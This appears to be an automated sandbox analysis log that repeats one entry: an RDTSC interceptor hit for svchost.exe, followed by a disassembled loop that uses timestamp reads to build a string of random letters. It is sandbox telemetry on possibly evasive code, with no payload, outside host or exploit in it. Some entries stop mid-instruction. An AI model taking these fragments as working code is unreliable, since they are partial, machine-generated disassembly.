Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59844h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59653h 0x00000031 call 2AA4FBF6h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59850h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59504h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59653h 0x00000033 call 2AA4F7D6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59690h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59844h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA594D3h 0x00000031 call 2AA4F9F6h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59850h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59844h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59453h 0x00000033 call 2AA4FD36h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59690h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA598E4h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59653h 0x00000031 call 2AA4FD36h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA598F0h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA594E4h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59813h 0x00000033 call 2AA4FEF6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59550h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59684h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59313h 0x00000031 call 2AA4FEF6h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59850h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA59875h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4F9F6h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59690h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59484h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59453h 0x00000033 call 2AA4FF96h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59690h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA59875h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FEF6h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59350h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA596B5h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FB36h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA598F0h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59484h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA594B3h 0x00000033 call 2AA4FF96h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59250h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59484h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA590F3h 0x00000031 call 2AA4FB36h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA598F0h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59844h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59453h 0x00000033 call 2AA4F8F6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59690h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA59375h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FB36h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA598F0h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA594E4h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59813h 0x00000033 call 2AA4FD36h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59350h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59844h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59453h 0x00000031 call 2AA4FEF6h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA594F0h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA59175h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FD36h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59490h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59844h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59113h 0x00000033 call 2AA4FEF6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59690h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59544h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA598B3h 0x00000031 call 2AA4FEF6h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59850h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59844h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59313h 0x00000031 call 2AA4FB36h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59490h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA59275h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4F9F6h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59690h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA59575h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4F7D6h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59350h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA594E4h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59813h 0x00000033 call 2AA4FEF6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59850h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
